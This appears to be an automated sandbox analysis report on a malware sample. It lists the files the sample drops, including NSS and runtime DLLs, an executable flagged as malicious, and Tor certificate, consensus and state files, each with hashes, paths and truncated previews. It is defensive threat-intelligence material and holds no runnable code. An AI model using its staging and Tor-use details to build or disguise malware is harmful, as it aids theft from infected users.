Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ping[1].htm

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\syncUpd[1].exe

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	186368
Entropy (8bit):	7.118131966034216
Encrypted:	false
SSDEEP:	3072:Z+dRE4pt7joEHSYMv5DHfcSi9gj9TtKz/bOsKcl:c4+t7MdFhjfcnyBtq6U
MD5:	27284482B63B322A0877B1E4F51702FB
SHA1:	179FA862C24B82BC7F168C9DA0A41CA2633A31E1
SHA-256:	F4E79FFC5C3485ED38879624164F32F3855DEA2427A4648C557B442A1373F3BE
SHA-512:	2EB4045CAAB7500C54B6B8CBDA575185AD9E25AAFEC37FA565077CABA230C77DCB6E7952D94CF1ACFA3720B0F9A4969524981179E7487E64231D7079456A4253
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`.\$K..$K..$K..K=..=K..K=$.7K..K=..HK..-3).#K..$K..LK..K=..%K..K= .%K..K='.%K..Rich$K..................PE..L....Id.................V....?..............p....@..........................0B.................................................P.....B..&...........................................................................p...............................text...nT.......V.................. ..`.rdata...)...p......Z..............@..@.data...,_?......,..................@....rsrc....&....B..(..................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1628158735648508
Encrypted:	false
SSDEEP:	3:Nlllulzh8//h:NllUu
MD5:	2D936C9957097D6631C64386010C648E
SHA1:	AD0125A442F7BD53E9959CB996B58A685B09B85E
SHA-256:	C93CB35DFCB4C1F5BD3B665C67D749E585887E56B9081D0E9FC47F54909E7119
SHA-512:	27B07DBB385D27EF522ED09079877C6EBE9444FBE1E4401AF8BABB4B2EE4FC1CF7BC1A09B31A3A52ACA217B40E2B8207A5441D04F1C6D9A44C05E51C4D49E4AB
Malicious:	false
Reputation:	unknown
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

Process:	C:\Users\user\AppData\Local\Temp\AF26.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4315536
Entropy (8bit):	7.986023355020629
Encrypted:	false
SSDEEP:	98304:Ox34CiKzvjm7SLtMZTm7LASnwWEuCSeZHe31O6Y/qHYq9Pei:OB4yzvjmEtMf+wT3Us6Y/qHYKB
MD5:	D122F827C4FC73F9A06D7F6F2D08CD95
SHA1:	CD1D1DC2C79C0EE394B72EFC264CFD54D96E1EE5
SHA-256:	B7A6DCFDD64173ECBCEF562FD74AEE07F3639FA863BD5740C7E72DDC0592B4FC
SHA-512:	8755979D7383D6CB5E7D63798C9CA8B9C0FAEEC1FE81907FC75BBBB7BE6754AB7B5A09A98492A27F90E3F26951B6891C43D8ACD21414FB603CD86A4E10DAC986
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...&f.d.................`@..p...............p@...@...................................B......................................@.<.....A...............A..............q@...............................@.@............p@.`............................text....^@......`@................. ..`.rdata...W...p@..X...d@.............@..@.data.........@..P....@.............@....rsrc.....O...A.......A.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-certs (copy)

Process:	C:\Users\user\AppData\Local\Temp\81F7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	20852
Entropy (8bit):	6.051858529165917
Encrypted:	false
SSDEEP:	384:eea4igBVA1hrqtMY4QkV6icO1hMtq2h4YVc1h1b50IU4mV91h5q2q4PLVWO1h4yU:7a9gBSyRBkoicOaq6xyhb+3jntSyLJUx
MD5:	1A7FAD5FEE2FC58E616706DC1BF515EE
SHA1:	8D8A450B4E6D349AE85822E802FC351EFF0B72A7
SHA-256:	C0237C8807432724014BFC8B4054FC65668230F75DE57DCC8CCF7308253FC6D7
SHA-512:	46C4A695F4DA0AA46C66F74EAAFBE8018BFC8B599CA658E124922189168E0FF45F4575992DDDFC3A84A84785ACC70EE19FA72FB970BD6A59CE63A2629A50D111
Malicious:	false
Reputation:	unknown
Preview:	dir-key-certificate-version 3..fingerprint D586D18309DED4CD6D57C18FDB97EFA96D330566..dir-key-published 2022-11-10 23:21:36..dir-key-expires 2023-11-10 23:21:36..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAvi5+A+XPw4jxMYhmEI4+MpnaX3dUEbsMGHA+xAMnmVhuxbm3Dn5c..TyhQNY2LOlsieE84UYG+J4dABfaFH4w0l6zUJkuytX4+6WRQontw9puR/IcXkRwM..8Tv/tY675OYRCm9DgDAWfqZM0IgTzSrYRDl8eFPSFCOP0NhMrQZeUrdKgwAXVZWP..xt9nTCwT4K9BMp47LEmZKdEokeVsr0l29Z9v5+r24k9x8EQjDexsoHwlVrxWfarG..1klWssfSFpkMN+FkTQnBC6ByiBh5ZKM5AC/HkVFvuHjehUpfrtNk6XNFcKbDvEIg..qPdg1QWuuSWpZVA+/EwSBtwMNcq9pv60L8Cm9WCJoSC691WByiGwFCy1/XcBI4J/..BkoMEvP3kAxzm92jqGbpFSJawFRPZKy89FDKpha/So3CERQPV0ar+DTpVqDlryWV..N4x1IzpPeSHFj7T74q8qdrxx0wcAjWJ9WYoGQif6FK3hHcmbSGSgyvAFeoYxyUCL..JHkjBCD4WTWVAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEA2Vt7oP9P+yEV+zzaH40/j5PTsRb1Pyyzd6P3PLKObM6Wil/ZvcBF..XB7KDIO/bsL6/K1ZqQwn4zVaLQndNWNN2eXGWZ6F2l3h2nK4MbIMTYs1iiDgtDbe..zYYlGGJXbmD/iju0NaXwtnqstwZl

C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus (copy)

Process:	C:\Users\user\AppData\Local\Temp\81F7.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2709803
Entropy (8bit):	5.611048254057761
Encrypted:	false
SSDEEP:	12288:63Zjcn5jEgSIcV0e6gc/C9RlXQijDK/TDUNhs1hp37SjhtAs:6Gn6gSIc2Wc/iXk/Tgqfpmjhn
MD5:	719D81C83A59A4DD6E2ED9113C7ED3D2
SHA1:	B8767D91B6153974F4116EEE4B23FE75CA2B01AD
SHA-256:	A37EA415AE0E2A1A2DCB69FA293BD045B2BFEF5FBEB285642649A90C2B744632
SHA-512:	C55674678548E90EAA3344C2A76EF8FF0CDF6DF8E2A93D4DB4E68A3578C41C2F481105C5C5883AFBA83487D5846CA21E0892DC7D4C42F0C15D8D76E334AEDE08
Malicious:	false
Reputation:	unknown
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-20 23:00:00.fresh-until 2024-02-21 00:00:00.valid-until 2024-02-21 02:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

C:\Users\user\AppData\Local\Temp\4KPV6A~1\state (copy)

Process:	C:\Users\user\AppData\Local\Temp\81F7.exe
File Type:	ASCII text, with very long lines (352), with CRLF line terminators
Category:	dropped
Size (bytes):	4131
Entropy (8bit):	5.327265800413903
Encrypted:	false
SSDEEP:	96:n6Jwf3rl6SrzWy/HJgwJf8pXkVWM4gkvn:sQzr/1fA
MD5:	304CDA544F35DDE0C47D10A51DE7BEFD
SHA1:	1C1B2744361FC95401D6BF24F5B69BDE6B6B7752
SHA-256:	661FD2BD5F975B1CF755D2855AACF39905772E9FC7824812EC1800D44B6412FD
SHA-512:	ECF5F222B37BD5F2BA07BA3DB45E4FC93CE5371E3C0BEF0D1BBFCF1F5B9CC30A9CDA71A638B4DF4AD201DAE2C4E18271BF21CD2B29E2A6DE6F026A5AB5615CAF
Malicious:	false
Reputation:	unknown
Preview:	# Tor state file last generated on 2024-02-21 00:38:45 local time..# Other times below are in UTC..# You do not need to edit this file.....CircuitBuildTimeBin 925 1..CircuitBuildTimeBin 975 2..CircuitBuildTimeBin 1075 1..CircuitBuildTimeBin 1575 1..CircuitBuildTimeBin 2125 1..CircuitBuildTimeBin 2325 1..CircuitBuildTimeBin 8375 1..CircuitBuildTimeBin 8675 1..CircuitBuildTimeBin 8875 1..CircuitBuildTimeBin 9775 1..CircuitBuildTimeBin 10525 1..CircuitBuildTimeBin 16425 1..Dormant 0..Guard in=default rsa_id=8595C523AD191909F4146E4601081EE109B19023 nickname=Chmurka sampled_on=2024-02-16T04:08:17 sampled_idx=0 sampled_by=0.4.4.9 listed=1 confirmed_on=2024-02-14T08:56:10 confirmed_idx=0 pb_use_attempts=6.000000 pb_use_successes=6.000000 pb_circ_attempts=8.000000 pb_circ_successes=8.000000 pb_successful_circuits_closed=8.000000..Guard in=default rsa_id=786F980B60265FBDBDEA1B90B86930AACD42704F nickname=pembs3 sampled_on=2024-02-18T12:10:05 sampled_idx=1 sampled_by=0.4.4.9 listed=1..Guard in=

C:\Users\user\AppData\Local\Temp\4KPV6A~1\unverified-microdesc-consensus (copy)

Process:	C:\Users\user\AppData\Local\Temp\81F7.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2709803
Entropy (8bit):	5.611048254057761
Encrypted:	false
SSDEEP:	12288:63Zjcn5jEgSIcV0e6gc/C9RlXQijDK/TDUNhs1hp37SjhtAs:6Gn6gSIc2Wc/iXk/Tgqfpmjhn
MD5:	719D81C83A59A4DD6E2ED9113C7ED3D2
SHA1:	B8767D91B6153974F4116EEE4B23FE75CA2B01AD
SHA-256:	A37EA415AE0E2A1A2DCB69FA293BD045B2BFEF5FBEB285642649A90C2B744632
SHA-512:	C55674678548E90EAA3344C2A76EF8FF0CDF6DF8E2A93D4DB4E68A3578C41C2F481105C5C5883AFBA83487D5846CA21E0892DC7D4C42F0C15D8D76E334AEDE08
Malicious:	false
Reputation:	unknown
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-20 23:00:00.fresh-until 2024-02-21 00:00:00.valid-until 2024-02-21 02:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-certs.tmp

Process:	C:\Users\user\AppData\Local\Temp\81F7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	20852
Entropy (8bit):	6.051858529165917
Encrypted:	false
SSDEEP:	384:eea4igBVA1hrqtMY4QkV6icO1hMtq2h4YVc1h1b50IU4mV91h5q2q4PLVWO1h4yU:7a9gBSyRBkoicOaq6xyhb+3jntSyLJUx
MD5:	1A7FAD5FEE2FC58E616706DC1BF515EE
SHA1:	8D8A450B4E6D349AE85822E802FC351EFF0B72A7
SHA-256:	C0237C8807432724014BFC8B4054FC65668230F75DE57DCC8CCF7308253FC6D7
SHA-512:	46C4A695F4DA0AA46C66F74EAAFBE8018BFC8B599CA658E124922189168E0FF45F4575992DDDFC3A84A84785ACC70EE19FA72FB970BD6A59CE63A2629A50D111
Malicious:	false
Reputation:	unknown
Preview:	dir-key-certificate-version 3..fingerprint D586D18309DED4CD6D57C18FDB97EFA96D330566..dir-key-published 2022-11-10 23:21:36..dir-key-expires 2023-11-10 23:21:36..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAvi5+A+XPw4jxMYhmEI4+MpnaX3dUEbsMGHA+xAMnmVhuxbm3Dn5c..TyhQNY2LOlsieE84UYG+J4dABfaFH4w0l6zUJkuytX4+6WRQontw9puR/IcXkRwM..8Tv/tY675OYRCm9DgDAWfqZM0IgTzSrYRDl8eFPSFCOP0NhMrQZeUrdKgwAXVZWP..xt9nTCwT4K9BMp47LEmZKdEokeVsr0l29Z9v5+r24k9x8EQjDexsoHwlVrxWfarG..1klWssfSFpkMN+FkTQnBC6ByiBh5ZKM5AC/HkVFvuHjehUpfrtNk6XNFcKbDvEIg..qPdg1QWuuSWpZVA+/EwSBtwMNcq9pv60L8Cm9WCJoSC691WByiGwFCy1/XcBI4J/..BkoMEvP3kAxzm92jqGbpFSJawFRPZKy89FDKpha/So3CERQPV0ar+DTpVqDlryWV..N4x1IzpPeSHFj7T74q8qdrxx0wcAjWJ9WYoGQif6FK3hHcmbSGSgyvAFeoYxyUCL..JHkjBCD4WTWVAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEA2Vt7oP9P+yEV+zzaH40/j5PTsRb1Pyyzd6P3PLKObM6Wil/ZvcBF..XB7KDIO/bsL6/K1ZqQwn4zVaLQndNWNN2eXGWZ6F2l3h2nK4MbIMTYs1iiDgtDbe..zYYlGGJXbmD/iju0NaXwtnqstwZl

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdesc-consensus.tmp

Process:	C:\Users\user\AppData\Local\Temp\81F7.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2709803
Entropy (8bit):	5.611048254057761
Encrypted:	false
SSDEEP:	12288:63Zjcn5jEgSIcV0e6gc/C9RlXQijDK/TDUNhs1hp37SjhtAs:6Gn6gSIc2Wc/iXk/Tgqfpmjhn
MD5:	719D81C83A59A4DD6E2ED9113C7ED3D2
SHA1:	B8767D91B6153974F4116EEE4B23FE75CA2B01AD
SHA-256:	A37EA415AE0E2A1A2DCB69FA293BD045B2BFEF5FBEB285642649A90C2B744632
SHA-512:	C55674678548E90EAA3344C2A76EF8FF0CDF6DF8E2A93D4DB4E68A3578C41C2F481105C5C5883AFBA83487D5846CA21E0892DC7D4C42F0C15D8D76E334AEDE08
Malicious:	false
Reputation:	unknown
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-20 23:00:00.fresh-until 2024-02-21 00:00:00.valid-until 2024-02-21 02:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdescs.new

Process:	C:\Users\user\AppData\Local\Temp\81F7.exe
File Type:	ASCII text, with very long lines (15714)
Category:	dropped
Size (bytes):	21194984
Entropy (8bit):	4.809667373877699
Encrypted:	false
SSDEEP:	24576:pbiD40/Dmh7R+W93U1Z6AOhiK4iaqRYYMsPGFBbTNMF3oce4agJrR0lTkEH3uanX:pCDt5lqwfZqGJQg205JK74
MD5:	1DA33EA11C53E7FFB61A1FF3FEDA02DE
SHA1:	A90B1660814AB499DF59762982BCF617D633DB75
SHA-256:	7650420C8CB446E983591496B096A17BA211F3BAD14E11C5E9612D6719D7167C
SHA-512:	C61F1D709E843DF28461F535B5A4B2DD33FC9D258CAC1CE7E57122A736AC434BB4681254AF7C50DDE445686736AD69AB70B2F2FCA359D736652553A5D000BE4C
Malicious:	false
Reputation:	unknown
Preview:	@last-listed 2024-02-20 23:33:27.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAMtDc6t9rd2BDWFIV5wjpbweaoMXfuK7x8YwxcGldPxjmRDQYNhQJpCe.JXlcmnNef85Scq0qJjiI956JdM+6IWFs9mN989ynMGRcZrIv87ZbyoGUrKh7m6nW.nmdpURINkJlLZBdFkWpkX3FjBDqgRfR4PngyH65iH41JRwwjFNbDAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key nFGC+TQuOoshg3BgjaPahTHbYaN+9SJaAKaH37HE3Ww.id ed25519 OLp2JoPMyfZ8S683sjs0Jg9pKFzb/j9tBTZxNSsCk2A.@last-listed 2024-02-20 23:33:27.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAJcJzpR6guIf5/1b3NbO8IhaoKVOj2P1yrF7xo0hosgu7lj+ONVFxJnV.wk8ynhl3Dw2g1o2LMRJ8AEl7Eub060/VYYzL19EPNvwbA6UHP7zVNcthnHC/Bpkz.JkqutAFY4gJ7pCqpLrJ++YojR6lOjPnR8rPlVJYtjPm7z8G/fMiXAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key YbT5r7++EO1gOl21e+JRqIbdLGUyOMMxS5ZII82oyhY.id ed25519 SuaAxeKvury1Knby5GGc+xQgUbB3tJ0LuM42HVsaLR0.@last-listed 2024-02-20 23:33:27.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBALzZotdt3urr+Jg2XN5L5GEHUrfABp0rs34JOUbJq3ClnS4KoI9rgdBa.+LbwhtlZ+uMWC6wplitjw+c2pHBulmtgu0A+H9SzRWLe7

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\state.tmp

Process:	C:\Users\user\AppData\Local\Temp\81F7.exe
File Type:	ASCII text, with very long lines (352), with CRLF line terminators
Category:	modified
Size (bytes):	4131
Entropy (8bit):	5.327265800413903
Encrypted:	false
SSDEEP:	96:n6Jwf3rl6SrzWy/HJgwJf8pXkVWM4gkvn:sQzr/1fA
MD5:	304CDA544F35DDE0C47D10A51DE7BEFD
SHA1:	1C1B2744361FC95401D6BF24F5B69BDE6B6B7752
SHA-256:	661FD2BD5F975B1CF755D2855AACF39905772E9FC7824812EC1800D44B6412FD
SHA-512:	ECF5F222B37BD5F2BA07BA3DB45E4FC93CE5371E3C0BEF0D1BBFCF1F5B9CC30A9CDA71A638B4DF4AD201DAE2C4E18271BF21CD2B29E2A6DE6F026A5AB5615CAF
Malicious:	false
Reputation:	unknown
Preview:	# Tor state file last generated on 2024-02-21 00:38:45 local time..# Other times below are in UTC..# You do not need to edit this file.....CircuitBuildTimeBin 925 1..CircuitBuildTimeBin 975 2..CircuitBuildTimeBin 1075 1..CircuitBuildTimeBin 1575 1..CircuitBuildTimeBin 2125 1..CircuitBuildTimeBin 2325 1..CircuitBuildTimeBin 8375 1..CircuitBuildTimeBin 8675 1..CircuitBuildTimeBin 8875 1..CircuitBuildTimeBin 9775 1..CircuitBuildTimeBin 10525 1..CircuitBuildTimeBin 16425 1..Dormant 0..Guard in=default rsa_id=8595C523AD191909F4146E4601081EE109B19023 nickname=Chmurka sampled_on=2024-02-16T04:08:17 sampled_idx=0 sampled_by=0.4.4.9 listed=1 confirmed_on=2024-02-14T08:56:10 confirmed_idx=0 pb_use_attempts=6.000000 pb_use_successes=6.000000 pb_circ_attempts=8.000000 pb_circ_successes=8.000000 pb_successful_circuits_closed=8.000000..Guard in=default rsa_id=786F980B60265FBDBDEA1B90B86930AACD42704F nickname=pembs3 sampled_on=2024-02-18T12:10:05 sampled_idx=1 sampled_by=0.4.4.9 listed=1..Guard in=

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\unverified-microdesc-consensus.tmp

Process:	C:\Users\user\AppData\Local\Temp\81F7.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2709803
Entropy (8bit):	5.611048254057761
Encrypted:	false
SSDEEP:	12288:63Zjcn5jEgSIcV0e6gc/C9RlXQijDK/TDUNhs1hp37SjhtAs:6Gn6gSIc2Wc/iXk/Tgqfpmjhn
MD5:	719D81C83A59A4DD6E2ED9113C7ED3D2
SHA1:	B8767D91B6153974F4116EEE4B23FE75CA2B01AD
SHA-256:	A37EA415AE0E2A1A2DCB69FA293BD045B2BFEF5FBEB285642649A90C2B744632
SHA-512:	C55674678548E90EAA3344C2A76EF8FF0CDF6DF8E2A93D4DB4E68A3578C41C2F481105C5C5883AFBA83487D5846CA21E0892DC7D4C42F0C15D8D76E334AEDE08
Malicious:	false
Reputation:	unknown
